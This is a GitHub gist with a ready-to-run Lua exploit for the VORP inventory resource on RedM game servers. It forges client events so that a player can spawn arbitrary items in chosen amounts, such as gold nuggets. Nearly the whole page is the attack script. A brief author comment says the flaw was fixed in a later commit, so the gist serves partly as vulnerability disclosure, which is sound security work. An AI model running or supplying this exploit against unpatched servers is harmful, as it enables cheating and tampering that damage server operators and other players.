Skip to content

Instantly share code, notes, and snippets.

@draobrehtom
Last active July 19, 2024 23:03
Show Gist options
  • Save draobrehtom/20bb3925e8c36fa7a7d4747a650623cd to your computer and use it in GitHub Desktop.
Save draobrehtom/20bb3925e8c36fa7a7d4747a650623cd to your computer and use it in GitHub Desktop.
Exploiting inventory items within the VORP Framework (RedM) for educational purposes.
-- vorp_inventory source code:https://github.com/VORPCORE/vorp_inventory-lua
local uid = nil
RegisterNetEvent('vorpInventory:sharePickupClient', function(data)
if data.obj == 'NEVER_TRUST_CLIENT_SIDE' then
uid = data.uid
end
end)
RegisterCommand('exploit', function(source, args)
local name = args[1] or 'gold_nugget'
local amount = tonumber(args[2]) or 1
local metadata = {}
local weaponId = 1
local data = {
name = name,
obj = 'NEVER_TRUST_CLIENT_SIDE',
amount = amount,
metadata = metadata,
position = GetEntityCoords(PlayerPedId()),
weaponId = weaponId,
}
TriggerServerEvent("vorpinventory:sharePickupServer", data)
local timeoutAt = GetGameTimer() + 30000
while uid == nil do
Wait(0)
if GetGameTimer() > timeoutAt then
print('Request timeout. UID was not received.')
return
end
end
TriggerServerEvent("vorpinventory:onPickup", {
data = {
['NEVER_TRUST_CLIENT_SIDE'] = {
uid = uid,
},
},
key = 'NEVER_TRUST_CLIENT_SIDE',
})
uid = nil
end)
@draobrehtom
Copy link
Author

Vulnerability has been fixed in next commit: VORPCORE/vorp_inventory-lua@eeb2bb5

@draobrehtom
Copy link
Author

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment